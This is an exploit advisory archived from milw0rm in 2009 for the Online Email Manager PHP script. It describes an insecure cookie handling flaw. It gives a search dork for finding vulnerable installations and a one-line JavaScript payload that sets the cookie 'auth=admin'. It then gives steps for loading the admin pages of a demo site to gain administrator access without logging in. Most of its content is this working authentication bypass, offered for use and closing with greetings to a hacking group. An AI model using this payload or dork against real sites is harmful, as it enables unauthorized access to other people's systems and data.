Online Email Manager Insecure Cookie Handling Vulnerability {____________________________________} Author: Hussin X Home : WwW.IQ-TY.CoM email: darkangel_g85[at]Yahoo[DoT]com {____________________________________} script : http://www.esoftpro.com/web_scripts_online_email_manager.phps DorK : Powered by Online Email Manager exploit: javascript:document.cookie = "auth=admin; path=/"; exploit for demo |# http://www.esoftpro.com/demo/OEM/admin/index.php |ex javascript:document.cookie = "auth=admin; path=/"; |# go to url "emailList.php" |# http://www.esoftpro.com/demo/OEM/admin/emailList.php |# you login in to admin page :d Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab } end. # milw0rm.com [2009-04-17]